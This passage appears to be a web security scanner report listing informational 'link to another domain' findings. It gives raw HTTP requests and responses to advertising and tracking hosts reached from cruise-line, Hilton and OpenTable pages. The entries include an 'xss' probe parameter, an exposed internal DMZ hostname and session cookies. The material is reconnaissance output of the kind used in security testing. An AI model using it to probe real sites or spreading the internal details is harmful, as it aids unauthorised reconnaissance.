HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 302
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/home.do/695110522/x95/default/empty.gif/4d686437616b364a7257454142786c49?x" target="_top"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
17.4. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/royalcaribbean.com/search/processSearch.do/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/1971271866/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
17.5. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/royalcaribbean.com/search/processSearch.do/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/1017237109/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
17.6. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99002923&u= HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 03 Oct 2011 12:46:51 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...
17.7. http://cbi.boldchat.com/aid/664584437666327480/bc.cbi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cbi.boldchat.com
Path:   /aid/664584437666327480/bc.cbi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /aid/664584437666327480/bc.cbi?cbdid=4065067775421211004&wdid=3014984921609837532&rdid=3669418958773612753 HTTP/1.1
Host: cbi.boldchat.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bc-visitor-id=4851320892863947163=8643616791963063189

Response

HTTP/1.1 302 Found
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.cruises.com/images_unique/cs/CS_CHATbanner_w.jpg
Connection: close
Date: Mon, 03 Oct 2011 12:42:35 GMT
Content-Length: 97

The URL has moved <a href="http://www.cruises.com/images_unique/cs/CS_CHATbanner_w.jpg">here</a>
17.8. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 12:52:46 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...
17.9. http://data.7bpeople.com/web_legend/check_ab_testing/1_b1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.7bpeople.com
Path:   /web_legend/check_ab_testing/1_b1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /web_legend/check_ab_testing/1_b1?h=www.cruisesonly.com HTTP/1.1
Host: data.7bpeople.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://xss.cx/web_legend/check_ab_testing/1_b1?h=www.cruisesonly.com
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
X-GHDB-Server: xss.cx
Date: Mon, 03 Oct 2011 12:41:42 GMT
Content-Length: 191

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://xss.cx/web_legend/check_ab_testing/1_b1?h=www.cruisesonly.com">here</a></body>
17.10. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 12:52:42 GMT
Expires: Mon, 03 Oct 2011 12:52:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1239
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://ads.bluelithium.com/pixel?id=1289459&t=2" width="1" height="1" /><!-- Segment Tag | Add Segment | Hilton DE (1672) | Hilton Homepage com DE (ah3) | Site Pages (169) | Expected URL: http://www.tbc.com -->
...[SNIP]...
<div style="position:absolute;"><img style="width:1px; height:1px;" src="http://servedby.flashtalking.com/segment/modify/ah3;;pixel/?name=HiltonHomepagecomDE"/></div>
...[SNIP]...
<div style="position:absolute;"><img style="width:1px; height:1px;" src="http://servedby.flashtalking.com/segment/modify/ahr;;pixel/?name=HiltonHomepageGlobalUK"/></div><script src="http://ib.adnxs.com/seg?add=178503&t=1" type="text/javascript"></script><script src="http://segment-pixel.invitemedia.com/pixel?pixelID=65630&partnerID=152&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=65630&partnerID=152&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...
17.11. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 12:47:03 GMT
Expires: Mon, 03 Oct 2011 12:47:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2816
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/j
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-80Jeo9DyKNVJY.gif?labels=_fp.event.Homepage" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- Begin adBrite, important page views tracking -->
<img src="http://bstats.adbrite.com/adserver/behavioral-data/0?d=48380967;bapid=12761;uid=1043107" border="0" hspace="0" vspace="0" width="1" height="1" />
<!-- End adBrite, important page views tracking --> <img src="http://pixel.traveladvertising.com/Live/Pixel.aspx?PlacementId=49766" border="0" width="1px" height="1px" />
<img border="0" src="http://r.turn.com/r/beacon?b2=1a-ycFsYb7TPva7ipM_9UQiCOoCfqyV9O_WTqaUZ19Kh5cu-MqDYZ3Xj0IBYf-bfGeIFKTNd3xzB36jrZoq6uw&cid="><!-- Google Code for Homepage Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1027523767/?label=tqxUCInrpwEQt4n76QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript><img height="1" width="1" src="http://switch.atdmt.com/action/drv_CelebrityHPVisitor"/><img src="http://www.imiclk.com/cgi/r.cgi?m=3&mid=938DrDeD&ptid=HOME&sp=1" width="1" height="1" border="0"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=ccl_cs=1&betq=10424=417165" width = "1" height = "1" border = "0"><img src="https://secure.traveladvertising.com/Live/Pixel.aspx?PlacementId=20764" border="0" width="1px" height="1px" /><img src="http://celeb.netmng.com/pixel/?aid=1012&tax=homepage" width="1" height="1" border="0" /><img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=CB9D0ABD809D69874D98FFB8D55099D9&rsi_site=21B202805740ADE441CA7B9E00856659&rsi_event=E7F3DDA9C484FA7B067250F080881EB4"/>
                       <IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_2011rfpcelebritycruises/Retargeting_Homepage_Nonsecure@Bottom3"><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=4305&pcv=30" type="text/javascript"></script>
...[SNIP]...
17.12. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 12:41:02 GMT
Expires: Mon, 03 Oct 2011 12:41:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1328
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script>document.wri
...[SNIP]...
</noscript><img src="http://media.fastclick.net/w/tre?ad_id=18543;evt=12426;cat1=13399;cat2=13400" width="1" height="1" border="0"><img src="http://t.mookie1.com/t/v1/event?%25&migClientId=160&migAction=rccom-hp&migSource=mig" width="0" height="0" border="0" /><!--- start of TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure B3 sx tag --->
<IFRAME WIDTH=1 HEIGHT=1 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" SRC="http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3"></iframe>
<!--- end of TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure B3 sx tag ---><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=rylcrbnint_cs=1&betq=805=348090" width = "1" height = "1" border = "0"></body>
...[SNIP]...
17.13. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2562825;type=searc600;cat=livep349;ord=1;num=[Random%20Number]? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 12:47:22 GMT
Expires: Mon, 03 Oct 2011 12:47:22 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 624
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start Quantcast
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-cblpBJfqJE1BI.gif?labels=_fp.event.Search" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
17.14. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /seg?add=178503&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 12:52:45 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 03 Oct 2011 12:52:45 GMT
Content-Length: 217

document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
17.15. http://mpp.specificclick.net/smp/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mpp.specificclick.net
Path:   /smp/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /smp/v=5;m=1;t=4211;ts= HTTP/1.1
Host: mpp.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://cache.specificmedia.com/creative/blank.gif
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 199
Date: Mon, 03 Oct 2011 12:46:52 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://cache.specificmedia.com/creative/blank.gif">here</a>.<p>
</body>
</html>
17.16. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.opentable.opt/home/1225001877@Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc18005.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.opentable.opt/home/1225001877@Middle1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.opentable.opt/home/1225001877@Middle1? HTTP/1.1
Host: oasc18005.247realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/adpanelcontent247.aspx?m=0&page=home_aspx&pagetype=HOME&adtype=BIGBOX
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; NXCLICK2=011RAUw5NX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 14:21:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2062
Content-Type: application/x-javascript
Set-Cookie: NSC_d18efm_qppm_iuuq=ffffffff09419e6d45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Middle1') {
document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.286676.OPENTABLE.COM/B5568318.11;sz=300x250;click0=http://oasc18005.247realmedia.com/RealMedia/ads/click_lx.ads/www.opentable.opt/home/L22/346292571/Middle1/RGM/OPT-2712_Chase_300x250_Home/OPT-2712_Chase_300x250_Home_081911.html/4d686437616b356934616b41434d6658?;pc=OAS_OPT-2712_Chase_300x250_Home_081911;ord=346292571?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('> <SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5762.286676.OPENTABLE.COM/B5568318.11;abr=!ie;sz=300x250;click0=http://oasc18005.247realmedia.com/RealMedia/ads/click_lx.ads/www.opentable.opt/home/L22/346292571/Middle1/RGM/OPT-2712_Chase_300x250_Home/OPT-2712_Chase_300x250_Home_081911.html/4d686437616b356934616b41434d6658?;pc=OAS_OPT-2712_Chase_300x250_Home_081911;ord=346292571?"> </SCRIPT>
...[SNIP]...
1911.html/4d686437616b356934616b41434d6658?http://ad.doubleclick.net/jump/N5762.286676.OPENTABLE.COM/B5568318.11;abr=!ie4;abr=!ie5;sz=300x250;pc=OAS_OPT-2712_Chase_300x250_Home_081911;ord=346292571?"> <IMG SRC="http://ad.doubleclick.net/ad/N5762.286676.OPENTABLE.COM/B5568318.11;abr=!ie4;abr=!ie5;sz=300x250;pc=OAS_OPT-2712_Chase_300x250_Home_081911;ord=346292571?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
17.17. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /r/beacon?b2=1a-ycFsYb7TPva7ipM_9UQiCOoCfqyV9O_WTqaUZ19Kh5cu-MqDYZ3Xj0IBYf-bfGeIFKTNd3xzB36jrZoq6uw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C5%7C1002%7C5%7C1004%7C9%7C6%7C3; rds=15231%7C15228%7C15250%7C15249%7C15250%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 12:47:06 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1442346&t=2
Date: Mon, 03 Oct 2011 12:47:06 GMT
Content-Length: 165

<html><body><p>Redirecting to <a href="http://ad.yieldmanager.com/pixel?id=1442346&amp;t=2">http://ad.yieldmanager.com/pixel?id=1442346&amp;t=2</a></p></body></html>
17.18. http://reviews.opentable.com/0938/200/reviews.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reviews.opentable.com
Path:   /0938/200/reviews.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /0938/200/reviews.htm?format=embedded HTTP/1.1
Host: reviews.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
